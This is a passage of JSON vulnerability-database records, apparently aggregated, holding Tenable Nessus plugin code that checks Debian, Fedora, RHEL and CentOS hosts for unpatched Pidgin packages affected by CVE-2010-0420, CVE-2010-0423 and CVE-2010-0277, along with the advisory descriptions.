security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pidgin-dev\", ver:\"2.6.2-1ubuntu7.2\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-07-10T06:03:05", "references": ["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=566775", "https://security-tracker.debian.org/tracker/CVE-2010-0423", "https://security-tracker.debian.org/tracker/CVE-2010-0420", "http://www.debian.org/security/2010/dsa-2038"], "pluginID": "45560", "description": "Several remote vulnerabilities have been discovered in Pidgin, a multi protocol instant messaging client. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2010-0420 Crafted nicknames in the XMPP protocol can crash Pidgin remotely.\n\n - CVE-2010-0423 Remote contacts may send too many custom smilies, crashing Pidgin.\n\nSince a few months, Microsoft's servers for MSN have changed the protocol, making Pidgin non-functional for use with MSN. It is not feasible to port these changes to the version of Pidgin in Debian Lenny. This update formalises that situation by disabling the protocol in the client. Users of the MSN protocol are advised to use the version of Pidgin in the repositories of www.backports.org.", "edition": 4, "reporter": "Tenable", "published": "2010-04-19T00:00:00", "title": "Debian DSA-2038-1 : pidgin - several vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423"], "modified": "2018-07-09T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:pidgin"], "id": "DEBIAN_DSA-2038.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=45560", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2038. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(45560);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/09 14:30:24\");\n\n script_cve_id(\"CVE-2010-0420\", \"CVE-2010-0423\");\n script_bugtraq_id(38294);\n script_xref(name:\"DSA\", value:\"2038\");\n\n script_name(english:\"Debian DSA-2038-1 : pidgin - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in Pidgin, a multi\nprotocol instant messaging client. The Common Vulnerabilities and\nExposures project identifies the following problems :\n\n - CVE-2010-0420\n Crafted nicknames in the XMPP protocol can crash Pidgin\n remotely.\n\n - CVE-2010-0423\n Remote contacts may send too many custom smilies,\n crashing Pidgin.\n\nSince a few months, Microsoft's servers for MSN have changed the\nprotocol, making Pidgin non-functional for use with MSN. It is not\nfeasible to port these changes to the version of Pidgin in Debian\nLenny. This update formalises that situation by disabling the protocol\nin the client. Users of the MSN protocol are advised to use the\nversion of Pidgin in the repositories of www.backports.org.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=566775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-0420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-0423\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2010/dsa-2038\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the pidgin package.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.4.3-4lenny6.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/04/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"finch\", reference:\"2.4.3-4lenny6\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"finch-dev\", reference:\"2.4.3-4lenny6\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpurple-bin\", reference:\"2.4.3-4lenny6\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpurple-dev\", reference:\"2.4.3-4lenny6\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpurple0\", reference:\"2.4.3-4lenny6\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pidgin\", reference:\"2.4.3-4lenny6\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pidgin-data\", reference:\"2.4.3-4lenny6\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pidgin-dbg\", reference:\"2.4.3-4lenny6\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pidgin-dev\", reference:\"2.4.3-4lenny6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-29T13:38:32", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=565792", "http://www.nessus.org/u?6c03fc1a", "https://bugzilla.redhat.com/show_bug.cgi?id=565786", "https://bugzilla.redhat.com/show_bug.cgi?id=554335"], "pluginID": "47286", "description": "2.6.6 with security and numerous minor bug fixes CVE-2010-0277 CVE-2010-0420 CVE-2010-0423\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 3, "reporter": "Tenable", "published": "2010-07-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "type": "nessus", "title": "Fedora 13 : pidgin-2.6.6-1.fc13 (2010-1934)", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "cpe": ["cpe:/o:fedoraproject:fedora:13", "p-cpe:/a:fedoraproject:fedora:pidgin"], "modified": "2016-12-08T00:00:00", "id": "FEDORA_2010-1934.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=47286", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-1934.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(47286);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:31:53 $\");\n\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_xref(name:\"FEDORA\", value:\"2010-1934\");\n\n script_name(english:\"Fedora 13 : pidgin-2.6.6-1.fc13 (2010-1934)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"2.6.6 with security and numerous minor bug fixes CVE-2010-0277\nCVE-2010-0420 CVE-2010-0423\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=554335\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=565786\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=565792\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-February/035347.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6c03fc1a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"pidgin-2.6.6-1.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"pidgin\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-07-30T14:27:53", "references": ["http://rhn.redhat.com/errata/RHSA-2010-0115.html", "https://www.redhat.com/security/data/cve/CVE-2010-0277.html", "https://www.redhat.com/security/data/cve/CVE-2010-0423.html", "https://www.redhat.com/security/data/cve/CVE-2010-0420.html"], "pluginID": "44666", "description": "Updated pidgin packages that fix three security issues are now available for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple accounts on multiple instant messaging networks simultaneously.\n\nAn input sanitization flaw was found in the way Pidgin's MSN protocol implementation handled MSNSLP invitations. A remote attacker could send a specially crafted INVITE request that would cause a denial of service (memory corruption and Pidgin crash). (CVE-2010-0277)\n\nA denial of service flaw was found in Finch's XMPP chat implementation, when using multi-user chat. If a Finch user in a multi-user chat session were to change their nickname to contain the HTML 'br' element, it would cause Finch to crash. (CVE-2010-0420)\n\nRed Hat would like to thank Sadrul Habib Chowdhury of the Pidgin project for responsibly reporting the CVE-2010-0420 issue.\n\nA denial of service flaw was found in the way Pidgin processed emoticon images. A remote attacker could flood the victim with emoticon images during mutual communication, leading to excessive CPU use. (CVE-2010-0423)\n\nThese packages upgrade Pidgin to version 2.6.6. Refer to the Pidgin release notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users are advised to upgrade to these updated packages, which correct these issues. Pidgin must be restarted for this update to take effect.", "edition": 4, "reporter": "Tenable", "published": "2010-02-19T00:00:00", "title": "RHEL 4 / 5 : pidgin (RHSA-2010:0115)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2018-07-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:pidgin-perl", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:libpurple", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:libpurple-perl", "cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:pidgin-devel", "p-cpe:/a:redhat:enterprise_linux:pidgin", "p-cpe:/a:redhat:enterprise_linux:finch-devel", "p-cpe:/a:redhat:enterprise_linux:libpurple-devel", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:finch", "p-cpe:/a:redhat:enterprise_linux:libpurple-tcl"], "id": "REDHAT-RHSA-2010-0115.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44666", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0115. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44666);\n script_version (\"1.19\");\n script_cvs_date(\"Date: 2018/07/25 18:58:05\");\n\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_bugtraq_id(38294);\n script_xref(name:\"RHSA\", value:\"2010:0115\");\n\n script_name(english:\"RHEL 4 / 5 : pidgin (RHSA-2010:0115)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pidgin packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nAn input sanitization flaw was found in the way Pidgin's MSN protocol\nimplementation handled MSNSLP invitations. A remote attacker could\nsend a specially crafted INVITE request that would cause a denial of\nservice (memory corruption and Pidgin crash). (CVE-2010-0277)\n\nA denial of service flaw was found in Finch's XMPP chat\nimplementation, when using multi-user chat. If a Finch user in a\nmulti-user chat session were to change their nickname to contain the\nHTML 'br' element, it would cause Finch to crash. (CVE-2010-0420)\n\nRed Hat would like to thank Sadrul Habib Chowdhury of the Pidgin\nproject for responsibly reporting the CVE-2010-0420 issue.\n\nA denial of service flaw was found in the way Pidgin processed\nemoticon images. A remote attacker could flood the victim with\nemoticon images during mutual communication, leading to excessive CPU\nuse. (CVE-2010-0423)\n\nThese packages upgrade Pidgin to version 2.6.6. Refer to the Pidgin\nrelease notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users are advised to upgrade to these updated packages,\nwhich correct these issues. Pidgin must be restarted for this update\nto take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-0277.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-0420.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-0423.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2010-0115.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0115\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"finch-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"finch-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"finch-devel-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"finch-devel-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-devel-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-devel-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-perl-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-perl-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-tcl-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-tcl-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"pidgin-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"pidgin-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"pidgin-devel-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"pidgin-devel-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"pidgin-perl-2.6.6-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"pidgin-perl-2.6.6-1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"finch-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"finch-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"finch-devel-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"finch-devel-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-devel-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-devel-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-perl-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-perl-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-tcl-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-tcl-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pidgin-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pidgin-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pidgin-devel-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pidgin-devel-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pidgin-perl-2.6.6-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pidgin-perl-2.6.6-1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-devel / libpurple / libpurple-devel / libpurple-perl / etc\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-07-03T09:40:49", "references": ["http://www.nessus.org/u?2cf9c55c", "http://www.nessus.org/u?bd79f59a", "http://www.nessus.org/u?40b0472b", "http://www.nessus.org/u?0347372a"], "pluginID": "44671", "description": "Updated pidgin packages that fix three security issues are now available for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple accounts on multiple instant messaging networks simultaneously.\n\nAn input sanitization flaw was found in the way Pidgin's MSN protocol implementation handled MSNSLP invitations. A remote attacker could send a specially crafted INVITE request that would cause a denial of service (memory corruption and Pidgin crash). (CVE-2010-0277)\n\nA denial of service flaw was found in Finch's XMPP chat implementation, when using multi-user chat. If a Finch user in a multi-user chat session were to change their nickname to contain the HTML 'br' element, it would cause Finch to crash. (CVE-2010-0420)\n\nRed Hat would like to thank Sadrul Habib Chowdhury of the Pidgin project for responsibly reporting the CVE-2010-0420 issue.\n\nA denial of service flaw was found in the way Pidgin processed emoticon images. A remote attacker could flood the victim with emoticon images during mutual communication, leading to excessive CPU use. (CVE-2010-0423)\n\nThese packages upgrade Pidgin to version 2.6.6. Refer to the Pidgin release notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users are advised to upgrade to these updated packages, which correct these issues. Pidgin must be restarted for this update to take effect.", "edition": 4, "reporter": "Tenable", "published": "2010-02-22T00:00:00", "title": "CentOS 4 / 5 : pidgin (CESA-2010:0115)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2018-07-02T00:00:00", "cpe": ["p-cpe:/a:centos:centos:libpurple-tcl", "p-cpe:/a:centos:centos:pidgin-perl", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:finch-devel", "p-cpe:/a:centos:centos:libpurple-devel", "p-cpe:/a:centos:centos:libpurple", "p-cpe:/a:centos:centos:pidgin", "p-cpe:/a:centos:centos:finch", "p-cpe:/a:centos:centos:pidgin-devel", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:libpurple-perl"], "id": "CENTOS_RHSA-2010-0115.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44671", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0115 and \n# CentOS Errata and Security Advisory 2010:0115 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44671);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/07/02 18:48:52\");\n\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_bugtraq_id(38294);\n script_xref(name:\"RHSA\", value:\"2010:0115\");\n\n script_name(english:\"CentOS 4 / 5 : pidgin (CESA-2010:0115)\");\n script_summary(english:\"Checks rpm output for the updated 